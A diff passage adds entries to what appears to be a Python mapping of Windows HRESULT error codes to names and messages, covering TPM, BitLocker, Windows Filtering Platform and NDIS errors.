+ 0x8028003C: ("TPM_E_AREA_LOCKED", "The NV area is locked and not writable."),
+ 0x8028003D: ("TPM_E_BAD_LOCALITY", "The locality is incorrect for the attempted operation."),
+ 0x8028003E: ("TPM_E_READ_ONLY", "The NV area is read-only and cannot be written to."),
+ 0x8028003F: ("TPM_E_PER_NOWRITE", "There is no protection on the write to the NV area."),
+ 0x80280040: ("TPM_E_FAMILYCOUNT", "The family count value does not match."),
+ 0x80280041: ("TPM_E_WRITE_LOCKED", "The NV area has already been written to."),
+ 0x80280042: ("TPM_E_BAD_ATTRIBUTES", "The NV area attributes conflict."),
+ 0x80280043: ("TPM_E_INVALID_STRUCTURE", "The structure tag and version are invalid or inconsistent."),
+ 0x80280044: ("TPM_E_KEY_OWNER_CONTROL", "The key is under control of the TPM owner and can only be evicted by the TPM owner."),
+ 0x80280045: ("TPM_E_BAD_COUNTER", "The counter handle is incorrect."),
+ 0x80280046: ("TPM_E_NOT_FULLWRITE", "The write is not a complete write of the area."),
+ 0x80280047: ("TPM_E_CONTEXT_GAP", "The gap between saved context counts is too large."),
+ 0x80280048: ("TPM_E_MAXNVWRITES", "The maximum number of NV writes without an owner has been exceeded."),
+ 0x80280049: ("TPM_E_NOOPERATOR", "No operator AuthData value is set."),
+ 0x8028004A: ("TPM_E_RESOURCEMISSING", "The resource pointed to by context is not loaded."),
+ 0x8028004B: ("TPM_E_DELEGATE_LOCK", "The delegate administration is locked."),
+ 0x8028004C: ("TPM_E_DELEGATE_FAMILY", "Attempt to manage a family other then the delegated family."),
+ 0x8028004D: ("TPM_E_DELEGATE_ADMIN", "Delegation table management not enabled."),
+ 0x8028004E: ("TPM_E_TRANSPORT_NOTEXCLUSIVE", "There was a command executed outside an exclusive transport session."),
+ 0x8028004F: ("TPM_E_OWNER_CONTROL", "Attempt to context save an owner evict controlled key."),
+ 0x80280050: ("TPM_E_DAA_RESOURCES", "The DAA command has no resources available to execute the command."),
+ 0x80280051: ("TPM_E_DAA_INPUT_DATA0", "The consistency check on DAA parameter inputData0 has failed."),
+ 0x80280052: ("TPM_E_DAA_INPUT_DATA1", "The consistency check on DAA parameter inputData1 has failed."),
+ 0x80280053: ("TPM_E_DAA_ISSUER_SETTINGS", "The consistency check on DAA_issuerSettings has failed."),
+ 0x80280054: ("TPM_E_DAA_TPM_SETTINGS", "The consistency check on DAA_tpmSpecific has failed."),
+ 0x80280055: ("TPM_E_DAA_STAGE", "The atomic process indicated by the submitted DAA command is not the expected process."),
+ 0x80280056: ("TPM_E_DAA_ISSUER_VALIDITY", "The issuer's validity check has detected an inconsistency."),
+ 0x80280057: ("TPM_E_DAA_WRONG_W", "The consistency check on w has failed."),
+ 0x80280058: ("TPM_E_BAD_HANDLE", "The handle is incorrect."),
+ 0x80280059: ("TPM_E_BAD_DELEGATE", "Delegation is not correct."),
+ 0x8028005A: ("TPM_E_BADCONTEXT", "The context blob is invalid."),
+ 0x8028005B: ("TPM_E_TOOMANYCONTEXTS", "Too many contexts held by the TPM."),
+ 0x8028005C: ("TPM_E_MA_TICKET_SIGNATURE", "Migration authority signature validation failure."),
+ 0x8028005D: ("TPM_E_MA_DESTINATION", "Migration destination not authenticated."),
+ 0x8028005E: ("TPM_E_MA_SOURCE", "Migration source incorrect."),
+ 0x8028005F: ("TPM_E_MA_AUTHORITY", "Incorrect migration authority."),
+ 0x80280061: ("TPM_E_PERMANENTEK", "Attempt to revoke the EK and the EK is not revocable."),
+ 0x80280062: ("TPM_E_BAD_SIGNATURE", "Bad signature of CMK ticket."),
+ 0x80280063: ("TPM_E_NOCONTEXTSPACE", "There is no room in the context list for additional contexts."),
+ 0x80280400: ("TPM_E_COMMAND_BLOCKED", "The command was blocked."),
+ 0x80280401: ("TPM_E_INVALID_HANDLE", "The specified handle was not found."),
+ 0x80280402: ("TPM_E_DUPLICATE_VHANDLE", "The TPM returned a duplicate handle and the command needs to be resubmitted."),
+ 0x80280403: ("TPM_E_EMBEDDED_COMMAND_BLOCKED", "The command within the transport was blocked."),
+ 0x80280404: ("TPM_E_EMBEDDED_COMMAND_UNSUPPORTED", "The command within the transport is not supported."),
+ 0x80280800: ("TPM_E_RETRY", "The TPM is too busy to respond to the command immediately, but the command could be resubmitted at a later time."),
+ 0x80280801: ("TPM_E_NEEDS_SELFTEST", "SelfTestFull has not been run."),
+ 0x80280802: ("TPM_E_DOING_SELFTEST", "The TPM is currently executing a full self-test."),
+ 0x80280803: ("TPM_E_DEFEND_LOCK_RUNNING", "The TPM is defending against dictionary attacks and is in a time-out period."),
+ 0x80284001: ("TBS_E_INTERNAL_ERROR", "An internal software error has been detected."),
+ 0x80284002: ("TBS_E_BAD_PARAMETER", "One or more input parameters are bad."),
+ 0x80284003: ("TBS_E_INVALID_OUTPUT_POINTER", "A specified output pointer is bad."),
+ 0x80284004: ("TBS_E_INVALID_CONTEXT", "The specified context handle does not refer to a valid context."),
+ 0x80284005: ("TBS_E_INSUFFICIENT_BUFFER", "A specified output buffer is too small."),
+ 0x80284006: ("TBS_E_IOERROR", "An error occurred while communicating with the TPM."),
+ 0x80284007: ("TBS_E_INVALID_CONTEXT_PARAM", "One or more context parameters are invalid."),
+ 0x80284008: ("TBS_E_SERVICE_NOT_RUNNING", "The TPM Base Services (TBS) is not running and could not be started."),
+ 0x80284009: ("TBS_E_TOO_MANY_TBS_CONTEXTS", "A new context could not be created because there are too many open contexts."),
+ 0x8028400A: ("TBS_E_TOO_MANY_RESOURCES", "A new virtual resource could not be created because there are too many open virtual resources."),
+ 0x8028400B: ("TBS_E_SERVICE_START_PENDING", "The TBS service has been started but is not yet running."),
+ 0x8028400C: ("TBS_E_PPI_NOT_SUPPORTED", "The physical presence interface is not supported."),
+ 0x8028400D: ("TBS_E_COMMAND_CANCELED", "The command was canceled."),
+ 0x8028400E: ("TBS_E_BUFFER_TOO_LARGE", "The input or output buffer is too large."),
+ 0x80290100: ("TPMAPI_E_INVALID_STATE", "The command buffer is not in the correct state."),
+ 0x80290101: ("TPMAPI_E_NOT_ENOUGH_DATA", "The command buffer does not contain enough data to satisfy the request."),
+ 0x80290102: ("TPMAPI_E_TOO_MUCH_DATA", "The command buffer cannot contain any more data."),
+ 0x80290103: ("TPMAPI_E_INVALID_OUTPUT_POINTER", "One or more output parameters was null or invalid."),
+ 0x80290104: ("TPMAPI_E_INVALID_PARAMETER", "One or more input parameters are invalid."),
+ 0x80290105: ("TPMAPI_E_OUT_OF_MEMORY", "Not enough memory was available to satisfy the request."),
+ 0x80290106: ("TPMAPI_E_BUFFER_TOO_SMALL", "The specified buffer was too small."),
+ 0x80290107: ("TPMAPI_E_INTERNAL_ERROR", "An internal error was detected."),
+ 0x80290108: ("TPMAPI_E_ACCESS_DENIED", "The caller does not have the appropriate rights to perform the requested operation."),
+ 0x80290109: ("TPMAPI_E_AUTHORIZATION_FAILED", "The specified authorization information was invalid."),
+ 0x8029010A: ("TPMAPI_E_INVALID_CONTEXT_HANDLE", "The specified context handle was not valid."),
+ 0x8029010B: ("TPMAPI_E_TBS_COMMUNICATION_ERROR", "An error occurred while communicating with the TBS."),
+ 0x8029010C: ("TPMAPI_E_TPM_COMMAND_ERROR", "The TPM returned an unexpected result."),
+ 0x8029010D: ("TPMAPI_E_MESSAGE_TOO_LARGE", "The message was too large for the encoding scheme."),
+ 0x8029010E: ("TPMAPI_E_INVALID_ENCODING", "The encoding in the binary large object (BLOB) was not recognized."),
+ 0x8029010F: ("TPMAPI_E_INVALID_KEY_SIZE", "The key size is not valid."),
+ 0x80290110: ("TPMAPI_E_ENCRYPTION_FAILED", "The encryption operation failed."),
+ 0x80290111: ("TPMAPI_E_INVALID_KEY_PARAMS", "The key parameters structure was not valid."),
+ 0x80290112: ("TPMAPI_E_INVALID_MIGRATION_AUTHORIZATION_BLOB", "The requested supplied data does not appear to be a valid migration authorization BLOB."),
+ 0x80290113: ("TPMAPI_E_INVALID_PCR_INDEX", "The specified PCR index was invalid."),
+ 0x80290114: ("TPMAPI_E_INVALID_DELEGATE_BLOB", "The data given does not appear to be a valid delegate BLOB."),
+ 0x80290115: ("TPMAPI_E_INVALID_CONTEXT_PARAMS", "One or more of the specified context parameters was not valid."),
+ 0x80290116: ("TPMAPI_E_INVALID_KEY_BLOB", "The data given does not appear to be a valid key BLOB."),
+ 0x80290117: ("TPMAPI_E_INVALID_PCR_DATA", "The specified PCR data was invalid."),
+ 0x80290118: ("TPMAPI_E_INVALID_OWNER_AUTH", "The format of the owner authorization data was invalid."),
+ 0x80290200: ("TBSIMP_E_BUFFER_TOO_SMALL", "The specified buffer was too small."),
+ 0x80290201: ("TBSIMP_E_CLEANUP_FAILED", "The context could not be cleaned up."),
+ 0x80290202: ("TBSIMP_E_INVALID_CONTEXT_HANDLE", "The specified context handle is invalid."),
+ 0x80290203: ("TBSIMP_E_INVALID_CONTEXT_PARAM", "An invalid context parameter was specified."),
+ 0x80290204: ("TBSIMP_E_TPM_ERROR", "An error occurred while communicating with the TPM."),
+ 0x80290205: ("TBSIMP_E_HASH_BAD_KEY", "No entry with the specified key was found."),
+ 0x80290206: ("TBSIMP_E_DUPLICATE_VHANDLE", "The specified virtual handle matches a virtual handle already in use."),
+ 0x80290207: ("TBSIMP_E_INVALID_OUTPUT_POINTER", "The pointer to the returned handle location was null or invalid."),
+ 0x80290208: ("TBSIMP_E_INVALID_PARAMETER", "One or more parameters are invalid."),
+ 0x80290209: ("TBSIMP_E_RPC_INIT_FAILED", "The RPC subsystem could not be initialized."),
+ 0x8029020A: ("TBSIMP_E_SCHEDULER_NOT_RUNNING", "The TBS scheduler is not running."),
+ 0x8029020B: ("TBSIMP_E_COMMAND_CANCELED", "The command was canceled."),
+ 0x8029020C: ("TBSIMP_E_OUT_OF_MEMORY", "There was not enough memory to fulfill the request."),
+ 0x8029020D: ("TBSIMP_E_LIST_NO_MORE_ITEMS", "The specified list is empty, or the iteration has reached the end of the list."),
+ 0x8029020E: ("TBSIMP_E_LIST_NOT_FOUND", "The specified item was not found in the list."),
+ 0x8029020F: ("TBSIMP_E_NOT_ENOUGH_SPACE", "The TPM does not have enough space to load the requested resource."),
+ 0x80290210: ("TBSIMP_E_NOT_ENOUGH_TPM_CONTEXTS", "There are too many TPM contexts in use."),
+ 0x80290211: ("TBSIMP_E_COMMAND_FAILED", "The TPM command failed."),
+ 0x80290212: ("TBSIMP_E_UNKNOWN_ORDINAL", "The TBS does not recognize the specified ordinal."),
+ 0x80290213: ("TBSIMP_E_RESOURCE_EXPIRED", "The requested resource is no longer available."),
+ 0x80290214: ("TBSIMP_E_INVALID_RESOURCE", "The resource type did not match."),
+ 0x80290215: ("TBSIMP_E_NOTHING_TO_UNLOAD", "No resources can be unloaded."),
+ 0x80290216: ("TBSIMP_E_HASH_TABLE_FULL", "No new entries can be added to the hash table."),
+ 0x80290217: ("TBSIMP_E_TOO_MANY_TBS_CONTEXTS", "A new TBS context could not be created because there are too many open contexts."),
+ 0x80290218: ("TBSIMP_E_TOO_MANY_RESOURCES", "A new virtual resource could not be created because there are too many open virtual resources."),
+ 0x80290219: ("TBSIMP_E_PPI_NOT_SUPPORTED", "The physical presence interface is not supported."),
+ 0x8029021A: ("TBSIMP_E_TPM_INCOMPATIBLE", "TBS is not compatible with the version of TPM found on the system."),
+ 0x80290300: ("TPM_E_PPI_ACPI_FAILURE", "A general error was detected when attempting to acquire the BIOS response to a physical presence command."),
+ 0x80290301: ("TPM_E_PPI_USER_ABORT", "The user failed to confirm the TPM operation request."),
+ 0x80290302: ("TPM_E_PPI_BIOS_FAILURE", "The BIOS failure prevented the successful execution of the requested TPM operation (for example, invalid TPM operation request, BIOS communication error with the TPM)."),
+ 0x80290303: ("TPM_E_PPI_NOT_SUPPORTED", "The BIOS does not support the physical presence interface."),
+ 0x80300002: ("PLA_E_DCS_NOT_FOUND", "A Data Collector Set was not found."),
+ 0x80300045: ("PLA_E_TOO_MANY_FOLDERS", "Unable to start Data Collector Set because there are too many folders."),
+ 0x80300070: ("PLA_E_NO_MIN_DISK", "Not enough free disk space to start Data Collector Set."),
+ 0x803000AA: ("PLA_E_DCS_IN_USE", "Data Collector Set is in use."),
+ 0x803000B7: ("PLA_E_DCS_ALREADY_EXISTS", "Data Collector Set already exists."),
+ 0x80300101: ("PLA_E_PROPERTY_CONFLICT", "Property value conflict."),
+ 0x80300102: ("PLA_E_DCS_SINGLETON_REQUIRED", "The current configuration for this Data Collector Set requires that it contain exactly one Data Collector."),
+ 0x80300103: ("PLA_E_CREDENTIALS_REQUIRED", "A user account is required to commit the current Data Collector Set properties."),
+ 0x80300104: ("PLA_E_DCS_NOT_RUNNING", "Data Collector Set is not running."),
+ 0x80300105: ("PLA_E_CONFLICT_INCL_EXCL_API", "A conflict was detected in the list of include and exclude APIs. Do not specify the same API in both the include list and the exclude list."),
+ 0x80300106: ("PLA_E_NETWORK_EXE_NOT_VALID", "The executable path specified refers to a network share or UNC path."),
+ 0x80300107: ("PLA_E_EXE_ALREADY_CONFIGURED", "The executable path specified is already configured for API tracing."),
+ 0x80300108: ("PLA_E_EXE_PATH_NOT_VALID", "The executable path specified does not exist. Verify that the specified path is correct."),
+ 0x80300109: ("PLA_E_DC_ALREADY_EXISTS", "Data Collector already exists."),
+ 0x8030010A: ("PLA_E_DCS_START_WAIT_TIMEOUT", "The wait for the Data Collector Set start notification has timed out."),
+ 0x8030010B: ("PLA_E_DC_START_WAIT_TIMEOUT", "The wait for the Data Collector to start has timed out."),
+ 0x8030010C: ("PLA_E_REPORT_WAIT_TIMEOUT", "The wait for the report generation tool to finish has timed out."),
+ 0x8030010D: ("PLA_E_NO_DUPLICATES", "Duplicate items are not allowed."),
+ 0x8030010E: ("PLA_E_EXE_FULL_PATH_REQUIRED", "When specifying the executable to trace, you must specify a full path to the executable and not just a file name."),
+ 0x8030010F: ("PLA_E_INVALID_SESSION_NAME", "The session name provided is invalid."),
+ 0x80300110: ("PLA_E_PLA_CHANNEL_NOT_ENABLED", "The Event Log channel Microsoft-Windows-Diagnosis-PLA/Operational must be enabled to perform this operation."),
+ 0x80300111: ("PLA_E_TASKSCHED_CHANNEL_NOT_ENABLED", "The Event Log channel Microsoft-Windows-TaskScheduler must be enabled to perform this operation."),
+ 0x80310000: ("FVE_E_LOCKED_VOLUME", "The volume must be unlocked before it can be used."),
+ 0x80310001: ("FVE_E_NOT_ENCRYPTED", "The volume is fully decrypted and no key is available."),
+ 0x80310002: ("FVE_E_NO_TPM_BIOS", "The firmware does not support using a TPM during boot."),
+ 0x80310003: ("FVE_E_NO_MBR_METRIC", "The firmware does not use a TPM to perform initial program load (IPL) measurement."),
+ 0x80310004: ("FVE_E_NO_BOOTSECTOR_METRIC", "The master boot record (MBR) is not TPM-aware."),
+ 0x80310005: ("FVE_E_NO_BOOTMGR_METRIC", "The BOOTMGR is not being measured by the TPM."),
+ 0x80310006: ("FVE_E_WRONG_BOOTMGR", "The BOOTMGR component does not perform expected TPM measurements."),
+ 0x80310007: ("FVE_E_SECURE_KEY_REQUIRED", "No secure key protection mechanism has been defined."),
+ 0x80310008: ("FVE_E_NOT_ACTIVATED", "This volume has not been provisioned for encryption."),
+ 0x80310009: ("FVE_E_ACTION_NOT_ALLOWED", "Requested action was denied by the full-volume encryption (FVE) control engine."),
+ 0x8031000A: ("FVE_E_AD_SCHEMA_NOT_INSTALLED", "The Active Directory forest does not contain the required attributes and classes to host FVE or TPM information."),
+ 0x8031000B: ("FVE_E_AD_INVALID_DATATYPE", "The type of data obtained from Active Directory was not expected."),
+ 0x8031000C: ("FVE_E_AD_INVALID_DATASIZE", "The size of the data obtained from Active Directory was not expected."),
+ 0x8031000D: ("FVE_E_AD_NO_VALUES", "The attribute read from Active Directory has no (zero) values."),
+ 0x8031000E: ("FVE_E_AD_ATTR_NOT_SET", "The attribute was not set."),
+ 0x8031000F: ("FVE_E_AD_GUID_NOT_FOUND", "The specified GUID could not be found."),
+ 0x80310010: ("FVE_E_BAD_INFORMATION", "The control block for the encrypted volume is not valid."),
+ 0x80310011: ("FVE_E_TOO_SMALL", "Not enough free space remaining on volume to allow encryption."),
+ 0x80310012: ("FVE_E_SYSTEM_VOLUME", "The volume cannot be encrypted because it is required to boot the operating system."),
+ 0x80310013: ("FVE_E_FAILED_WRONG_FS", "The volume cannot be encrypted because the file system is not supported."),
+ 0x80310014: ("FVE_E_FAILED_BAD_FS", "The file system is inconsistent. Run CHKDSK."),
+ 0x80310015: ("FVE_E_NOT_SUPPORTED", "This volume cannot be encrypted."),
+ 0x80310016: ("FVE_E_BAD_DATA", "Data supplied is malformed."),
+ 0x80310017: ("FVE_E_VOLUME_NOT_BOUND", "Volume is not bound to the system."),
+ 0x80310018: ("FVE_E_TPM_NOT_OWNED", "TPM must be owned before a volume can be bound to it."),
+ 0x80310019: ("FVE_E_NOT_DATA_VOLUME", "The volume specified is not a data volume."),
+ 0x8031001A: ("FVE_E_AD_INSUFFICIENT_BUFFER", "The buffer supplied to a function was insufficient to contain the returned data."),
+ 0x8031001B: ("FVE_E_CONV_READ", "A read operation failed while converting the volume."),
+ 0x8031001C: ("FVE_E_CONV_WRITE", "A write operation failed while converting the volume."),
+ 0x8031001D: ("FVE_E_KEY_REQUIRED", "One or more key protection mechanisms are required for this volume."),
+ 0x8031001E: ("FVE_E_CLUSTERING_NOT_SUPPORTED", "Cluster configurations are not supported."),
+ 0x8031001F: ("FVE_E_VOLUME_BOUND_ALREADY", "The volume is already bound to the system."),
+ 0x80310020: ("FVE_E_OS_NOT_PROTECTED", "The boot OS volume is not being protected via FVE."),
+ 0x80310021: ("FVE_E_PROTECTION_DISABLED", "All protection mechanisms are effectively disabled (clear key exists)."),
+ 0x80310022: ("FVE_E_RECOVERY_KEY_REQUIRED", "A recovery key protection mechanism is required."),
+ 0x80310023: ("FVE_E_FOREIGN_VOLUME", "This volume cannot be bound to a TPM."),
+ 0x80310024: ("FVE_E_OVERLAPPED_UPDATE", "The control block for the encrypted volume was updated by another thread. Try again."),
+ 0x80310025: ("FVE_E_TPM_SRK_AUTH_NOT_ZERO", "The SRK authentication of the TPM is not zero and, therefore, is not compatible."),
+ 0x80310026: ("FVE_E_FAILED_SECTOR_SIZE", "The volume encryption algorithm cannot be used on this sector size."),
+ 0x80310027: ("FVE_E_FAILED_AUTHENTICATION", "BitLocker recovery authentication failed."),
+ 0x80310028: ("FVE_E_NOT_OS_VOLUME", "The volume specified is not the boot OS volume."),
+ 0x80310029: ("FVE_E_AUTOUNLOCK_ENABLED", "Auto-unlock information for data volumes is present on the boot OS volume."),
+ 0x8031002A: ("FVE_E_WRONG_BOOTSECTOR", "The system partition boot sector does not perform TPM measurements."),
+ 0x8031002B: ("FVE_E_WRONG_SYSTEM_FS", "The system partition file system must be NTFS."),
+ 0x8031002C: ("FVE_E_POLICY_PASSWORD_REQUIRED", "Group policy requires a recovery password before encryption may begin."),
+ 0x8031002D: ("FVE_E_CANNOT_SET_FVEK_ENCRYPTED", "The volume encryption algorithm and key cannot be set on an encrypted volume."),
+ 0x8031002E: ("FVE_E_CANNOT_ENCRYPT_NO_KEY", "A key must be specified before encryption may begin."),
+ 0x80310030: ("FVE_E_BOOTABLE_CDDVD", "A bootable CD/DVD is in the system. Remove the CD/DVD and reboot the system."),
+ 0x80310031: ("FVE_E_PROTECTOR_EXISTS", "An instance of this key protector already exists on the volume."),
+ 0x80310032: ("FVE_E_RELATIVE_PATH", "The file cannot be saved to a relative path."),
+ 0x80320001: ("FWP_E_CALLOUT_NOT_FOUND", "The callout does not exist."),
+ 0x80320002: ("FWP_E_CONDITION_NOT_FOUND", "The filter condition does not exist."),
+ 0x80320003: ("FWP_E_FILTER_NOT_FOUND", "The filter does not exist."),
+ 0x80320004: ("FWP_E_LAYER_NOT_FOUND", "The layer does not exist."),
+ 0x80320005: ("FWP_E_PROVIDER_NOT_FOUND", "The provider does not exist."),
+ 0x80320006: ("FWP_E_PROVIDER_CONTEXT_NOT_FOUND", "The provider context does not exist."),
+ 0x80320007: ("FWP_E_SUBLAYER_NOT_FOUND", "The sublayer does not exist."),
+ 0x80320008: ("FWP_E_NOT_FOUND", "The object does not exist."),
+ 0x80320009: ("FWP_E_ALREADY_EXISTS", "An object with that GUID or LUID already exists."),
+ 0x8032000A: ("FWP_E_IN_USE", "The object is referenced by other objects and, therefore, cannot be deleted."),
+ 0x8032000B: ("FWP_E_DYNAMIC_SESSION_IN_PROGRESS", "The call is not allowed from within a dynamic session."),
+ 0x8032000C: ("FWP_E_WRONG_SESSION", "The call was made from the wrong session and, therefore, cannot be completed."),
+ 0x8032000D: ("FWP_E_NO_TXN_IN_PROGRESS", "The call must be made from within an explicit transaction."),
+ 0x8032000E: ("FWP_E_TXN_IN_PROGRESS", "The call is not allowed from within an explicit transaction."),
+ 0x8032000F: ("FWP_E_TXN_ABORTED", "The explicit transaction has been forcibly canceled."),
+ 0x80320010: ("FWP_E_SESSION_ABORTED", "The session has been canceled."),
+ 0x80320011: ("FWP_E_INCOMPATIBLE_TXN", "The call is not allowed from within a read-only transaction."),
+ 0x80320012: ("FWP_E_TIMEOUT", "The call timed out while waiting to acquire the transaction lock."),
+ 0x80320013: ("FWP_E_NET_EVENTS_DISABLED", "Collection of network diagnostic events is disabled."),
+ 0x80320014: ("FWP_E_INCOMPATIBLE_LAYER", "The operation is not supported by the specified layer."),
+ 0x80320015: ("FWP_E_KM_CLIENTS_ONLY", "The call is allowed for kernel-mode callers only."),
+ 0x80320016: ("FWP_E_LIFETIME_MISMATCH", "The call tried to associate two objects with incompatible lifetimes."),
+ 0x80320017: ("FWP_E_BUILTIN_OBJECT", "The object is built in and, therefore, cannot be deleted."),
+ 0x80320018: ("FWP_E_TOO_MANY_BOOTTIME_FILTERS", "The maximum number of boot-time filters has been reached."),
+ 0x80320019: ("FWP_E_NOTIFICATION_DROPPED", "A notification could not be delivered because a message queue is at its maximum capacity."),
+ 0x8032001A: ("FWP_E_TRAFFIC_MISMATCH", "The traffic parameters do not match those for the security association context."),
+ 0x8032001B: ("FWP_E_INCOMPATIBLE_SA_STATE", "The call is not allowed for the current security association state."),
+ 0x8032001C: ("FWP_E_NULL_POINTER", "A required pointer is null."),
+ 0x8032001D: ("FWP_E_INVALID_ENUMERATOR", "An enumerator is not valid."),
+ 0x8032001E: ("FWP_E_INVALID_FLAGS", "The flags field contains an invalid value."),
+ 0x8032001F: ("FWP_E_INVALID_NET_MASK", "A network mask is not valid."),
+ 0x80320020: ("FWP_E_INVALID_RANGE", "An FWP_RANGE is not valid."),
+ 0x80320021: ("FWP_E_INVALID_INTERVAL", "The time interval is not valid."),
+ 0x80320022: ("FWP_E_ZERO_LENGTH_ARRAY", "An array that must contain at least one element that is zero-length."),
+ 0x80320023: ("FWP_E_NULL_DISPLAY_NAME", "The displayData.name field cannot be null."),
+ 0x80320024: ("FWP_E_INVALID_ACTION_TYPE", "The action type is not one of the allowed action types for a filter."),
+ 0x80320025: ("FWP_E_INVALID_WEIGHT", "The filter weight is not valid."),
+ 0x80320026: ("FWP_E_MATCH_TYPE_MISMATCH", "A filter condition contains a match type that is not compatible with the operands."),
+ 0x80320027: ("FWP_E_TYPE_MISMATCH", "An FWP_VALUE or FWPM_CONDITION_VALUE is of the wrong type."),
+ 0x80320028: ("FWP_E_OUT_OF_BOUNDS", "An integer value is outside the allowed range."),
+ 0x80320029: ("FWP_E_RESERVED", "A reserved field is nonzero."),
+ 0x8032002A: ("FWP_E_DUPLICATE_CONDITION", "A filter cannot contain multiple conditions operating on a single field."),
+ 0x8032002B: ("FWP_E_DUPLICATE_KEYMOD", "A policy cannot contain the same keying module more than once."),
+ 0x8032002C: ("FWP_E_ACTION_INCOMPATIBLE_WITH_LAYER", "The action type is not compatible with the layer."),
+ 0x8032002D: ("FWP_E_ACTION_INCOMPATIBLE_WITH_SUBLAYER", "The action type is not compatible with the sublayer."),
+ 0x8032002E: ("FWP_E_CONTEXT_INCOMPATIBLE_WITH_LAYER", "The raw context or the provider context is not compatible with the layer."),
+ 0x8032002F: ("FWP_E_CONTEXT_INCOMPATIBLE_WITH_CALLOUT", "The raw context or the provider context is not compatible with the callout."),
+ 0x80320030: ("FWP_E_INCOMPATIBLE_AUTH_METHOD", "The authentication method is not compatible with the policy type."),
+ 0x80320031: ("FWP_E_INCOMPATIBLE_DH_GROUP", "The Diffie-Hellman group is not compatible with the policy type."),
+ 0x80320032: ("FWP_E_EM_NOT_SUPPORTED", "An Internet Key Exchange (IKE) policy cannot contain an Extended Mode policy."),
+ 0x80320033: ("FWP_E_NEVER_MATCH", "The enumeration template or subscription will never match any objects."),
+ 0x80320034: ("FWP_E_PROVIDER_CONTEXT_MISMATCH", "The provider context is of the wrong type."),
+ 0x80320035: ("FWP_E_INVALID_PARAMETER", "The parameter is incorrect."),
+ 0x80320036: ("FWP_E_TOO_MANY_SUBLAYERS", "The maximum number of sublayers has been reached."),
+ 0x80320037: ("FWP_E_CALLOUT_NOTIFICATION_FAILED", "The notification function for a callout returned an error."),
+ 0x80320038: ("FWP_E_INCOMPATIBLE_AUTH_CONFIG", "The IPsec authentication configuration is not compatible with the authentication type."),
+ 0x80320039: ("FWP_E_INCOMPATIBLE_CIPHER_CONFIG", "The IPsec cipher configuration is not compatible with the cipher type."),
+ 0x80340002: ("ERROR_NDIS_INTERFACE_CLOSING", "The binding to the network interface is being closed."),
+ 0x80340004: ("ERROR_NDIS_BAD_VERSION", "An invalid version was specified."),
+ 0x80340005: ("ERROR_NDIS_BAD_CHARACTERISTICS", "An invalid characteristics table was used."),
+ 0x80340006: ("ERROR_NDIS_ADAPTER_NOT_FOUND", "Failed to find the network interface, or the network interface is not ready."),
+ 0x80340007: ("ERROR_NDIS_OPEN_FAILED", "Failed to open the network interface."),
+ 0x80340008: ("ERROR_NDIS_DEVICE_FAILED", "The network interface has encountered an internal unrecoverable failure."),
+ 0x80340009: ("ERROR_NDIS_MULTICAST_FULL", "The multicast list on the network interface is full."),
+ 0x8034000A: ("ERROR_NDIS_MULTICAST_EXISTS", "An attempt was made to add a duplicate multicast address to the list."),
+ 0x8034000B: ("ERROR_NDIS_MULTICAST_NOT_FOUND", "At attempt was made to remove a multicast address that was never added."),
+ 0x8034000C: ("ERROR_NDIS_REQUEST_ABORTED", "The network interface aborted the request."),
+ 0x8034000D: ("ERROR_NDIS_RESET_IN_PROGRESS", "The network interface cannot process the request because it is being reset."),
+ 0x8034000F: ("ERROR_NDIS_INVALID_PACKET", "An attempt was made to send an invalid packet on a network interface."),
+ 0x80340010: ("ERROR_NDIS_INVALID_DEVICE_REQUEST", "The specified request is not a valid operation for the target device."),
+ 0x80340011: ("ERROR_NDIS_ADAPTER_NOT_READY", "The network interface is not ready to complete this operation."),
+ 0x80340014: ("ERROR_NDIS_INVALID_LENGTH", "The length of the buffer submitted for this operation is not valid."),
+ 0x80340015: ("ERROR_NDIS_INVALID_DATA", "The data used for this operation is not valid."),
+ 0x80340016: ("ERROR_NDIS_BUFFER_TOO_SHORT", "The length of the buffer submitted for this operation is too small."),
+ 0x80340017: ("ERROR_NDIS_INVALID_OID", "The network interface does not support this OID."),
+ 0x80340018: ("ERROR_NDIS_ADAPTER_REMOVED", "The network interface has been removed."),
+ 0x80340019: ("ERROR_NDIS_UNSUPPORTED_MEDIA", "The network interface does not support this media type."),
+ 0x8034001A: ("ERROR_NDIS_GROUP_ADDRESS_IN_USE", "An attempt was made to remove a token ring group address that is in use by other components."),
+ 0x8034001B: ("ERROR_NDIS_FILE_NOT_FOUND", "An attempt was made to map a file that cannot be found."),
+ 0x8034001C: ("ERROR_NDIS_ERROR_READING_FILE", "An error occurred while the NDIS tried to map the file."),
+ 0x8034001D: ("ERROR_NDIS_ALREADY_MAPPED", "An attempt was made to map a file that is already mapped."),
+ 0x8034001E: ("ERROR_NDIS_RESOURCE_CONFLICT", "An attempt to allocate a hardware resource failed because the resource is used by another component."),
+ 0x8034001F: ("ERROR_NDIS_MEDIA_DISCONNECTED", "The I/O operation failed because network media is disconnected or the wireless access point is out of range."),
+ 0x80340022: ("ERROR_NDIS_INVALID_ADDRESS", "The network address used in the request is invalid."),
+ 0x8034002A: ("ERROR_NDIS_PAUSED", "The offload operation on the network interface has been paused."),
+ 0x8034002B: ("ERROR_NDIS_INTERFACE_NOT_FOUND", "The network interface was not found."),
+ 0x8034002C: ("ERROR_NDIS_UNSUPPORTED_REVISION", "The revision number specified in the structure is not supported."),
+ 0x8034002D: ("ERROR_NDIS_INVALID_PORT", "The specified port does not exist on this network interface."),
+ 0x8034002E: ("ERROR_NDIS_INVALID_PORT_STATE", "The current state of the specified port on this network interface does not support the requested operation."),
+ 0x803400BB: ("ERROR_NDIS_NOT_SUPPORTED", "The network interface does not support this request."),
+ 0x80342000: ("ERROR_NDIS_DOT11_AUTO_CONFIG_ENABLED", "The wireless local area network (LAN) interface is in auto-configuration mode and does not support the requested parameter change operation."),
+ 0x80342001: ("ERROR_NDIS_DOT11_MEDIA_IN_USE", "The wireless LAN interface is busy and cannot perform the requested operation."),
+ 0x80342002: ("ERROR_NDIS_DOT11_POWER_STATE_INVALID", "The wireless LAN interface is shutting down and does not support the requested operation."),
+ 0x8DEAD01B: ("TRK_E_NOT_FOUND", "A requested object was not found."),
+ 0x8DEAD01C: ("TRK_E_VOLUME_QUOTA_EXCEEDED", "The server received a CREATE_VOLUME subrequest of a SYNC_VOLUMES request, but the ServerVolumeTable size limit for the RequestMachine has already been reached."),
+ 0x8DEAD01E: ("TRK_SERVER_TOO_BUSY", "The server is busy, and the client should retry the request at a later time."),
+ 0xC0090001: ("ERROR_AUDITING_DISABLED", "The specified event is currently not being audited."),
+ 0xC0090002: ("ERROR_ALL_SIDS_FILTERED", "The SID filtering operation removed all SIDs."),
